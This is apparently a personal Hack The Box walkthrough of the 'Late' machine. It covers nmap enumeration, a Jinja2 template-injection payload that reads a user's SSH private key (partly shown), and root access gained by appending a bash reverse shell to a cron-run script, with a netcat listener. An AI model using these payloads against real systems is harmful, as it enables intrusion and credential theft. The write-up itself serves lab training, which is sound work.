HTB Writeups
  • HTB Writeups
  • Boxes: Very Easy
    • Academy
    • Archetype
    • Arctic
    • Base
    • Bike
    • Blue
    • Explosion
    • Included
    • Markup
    • Oopsie
    • Redeemer
    • Responder
    • Shield
    • Unified
    • Vaccine
  • Boxes: Easy
    • Analytics
    • Armageddon
    • Bashed
    • Beep
    • Blocky
    • Bounty Hunter
    • Buff
    • Cap
    • CozyHosting
    • Devel
    • Explore
    • Forest
    • Grandpa
    • Granny
    • Horizontall
    • Jerry
    • Keeper
    • Knife
    • Lame
    • Late
    • Legacy
    • Mirai
    • Netmon
    • Nibbles
    • Optimum
    • Paper
    • Photobomb
    • Precious
    • RedPanda
    • Return
    • Sau
    • ScriptKiddie
    • Sense
    • Servmon
    • Shocker
    • Shoppy
    • Squashed
    • Trick
  • Boxes: Medium
    • Poison
  • Challenges
    • Behind the Scenes
    • Canvas
    • Debugging Interface
    • Digital Cube
    • Easy Phish
    • Find the Easy Pass
    • Forest
    • Infiltration
    • misDIRection
    • Pusheen Loves Graphs
    • Retro
    • Signals
    • The Secret of a Queen
    • Wrong Spooky Season
  • Fortresses
  • Cyber Apocalypse 2023: The Cursed Mission
    • The Cursed Mission
    • Alien Cradle
    • Critical Flight
    • Debug
    • Extraterrestrial Persistence
    • Getting Started
    • Needle in the Haystack
    • Orbital
    • Packet Cyclone
    • Passman
    • Perfect Sync
    • Persistence
    • Plaintext Tleasure
    • Questionnaire
    • Reconfiguration
    • Relic Maps
    • Roten
    • Secret Code
    • Shattered Tablet
    • Small StEps
  • Hack the Boo 2023
    • Hauntmart
    • Spellbrewery
    • Trick or Treat
    • Valhalloween
  • Cyber Apocalypse 2024: Hacker Royale
    • Hacker Royale
    • An Unusual Sighting
    • BoxCutter
    • BunnyPass
    • Character
    • Data Siege
    • Delulu
    • Dynastic
    • Fake Boost
    • Flag Command
    • Game Invitation
    • It has begun
    • KORP Terminal
    • Labyrinth Linguist
    • LockTalk
    • Lucky Faucet
    • Makeshift
    • Maze
    • Packed Away
    • Phreaky
    • Primary Knowledge
    • Pursue the Tracks
    • Rids
    • Russian Roulette
    • Stop Drop and Roll
    • Testimonial
    • TimeKORP
    • Unbreakable
    • Urgent
  • CYBER APOCALYPSE 2025: Tales from Eldoria
    • Tales from Eldoria
    • A New Hire
    • Cave Expedition
    • Echoes in Stone
    • Eldorion
    • Embassy
    • EncryptedScroll
    • HeliosDEX
    • Quack Quack
    • Silent Trap
    • Stealth Invasion
    • Tales for the Brave
    • The Ancient Citadel
    • The Hillside Haven
    • The Stone That Whispers
    • Thorins Amulet
    • ToolPie
    • Traces
    • Trial by Fire
    • Whispers of the Moonbeam
Powered by GitBook
On this page
  • Enumeration
  • Jinja2 SSTI
  • Persistence
  • Cronjob & Append Attribute
  1. Boxes: Easy

Late

Personal Rating: Medium

The main exploit for this box was very inconsistent, which is why I rated it medium. The exploit itself was rather common.

Enumeration

The first nmap scan shew those ports open:

sudo nmap -sC -sV <IP>

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.6 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-title: Late - Best online image tools
|_http-server-header: nginx/1.14.0 (Ubuntu)
<SNIP>

Through fuzzing with ffuf I only found contact.html and index.htm, which both were not really interesting. But the index.html referred a domain: images.late.htb. I added it to my hosts file and found a page that had a file upload feature. The site takes an uploaded image and extracts any text out of it. I first tried uploading a php reverse shell in form of an image, but i couldn't find an LFI to trigger it.

Jinja2 SSTI

Researching on the backend made me find Jinja2 as the backend template engine. I made an image that contained this test payload:

{{7*7}}

The resulting text was indeed 49. So I searched for Jinja2 SSTI payloads and tried out many. The main obstacle was the application being very inconsistent and not recognizing my text very well. After countless attempts and looking for the fonts and payloads other people used, this was the one that worked in the end:

${{request.application.__globals__.__builtins__.__import__("os").popen("cat /home/svc_acc/.ssh/id_rsa").read()}}

This payload itself took multiple attempts and didn't work with a bash reverse shell etc. so I was lucky that I could retrieve the private ssh key here. This was the uploaded image accordingly:

Persistence

The takeaway here is that if the exploit is inconsistent, you might have to go for the right persistence method, instead of trying to get a direct shell no matter what.

The user was svc_acc

-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAqe5XWFKVqleCyfzPo4HsfRR8uF/P/3Tn+fiAUHhnGvBBAyrM
<SNIP>
kxruFUgLHh7nEx/5/0r8gmcoCvFn98wvUPSNrgDJ25mnwYI0zzDrEw==
-----END RSA PRIVATE KEY-----

I transferred LinEnum, linuxprivchecker and pspy onto the machine. LinEnum and linuxprivchecker didn't return much interesting, but pspy did.

A cronjob seems to create the file /usr/local/sbin/ssh-alter.sh

Reading the file, I saw that it is executed when someone starts or ends an ssh connection to the machine.

Cronjob & Append Attribute

I cannot edit it with user permissions, however, lsattr on the file shew me, that I can append to it. So I appended a bash reverse shell to my host and ended the existing ssh connection. The script was executed as expected and i caught the reverse shell that was executed as root.

nc -lnvp 4444 #On my attacker machine
echo 'bash -i >& /dev/tcp/<ATTACKERIP>/4444 0>&1' >> /usr/local/sbin/ssh-alter.sh
exit
PreviousLameNextLegacy

Last updated 1 year ago

Sources:

https://www.onsecurity.io/blog/server-side-template-injection-with-jinja2/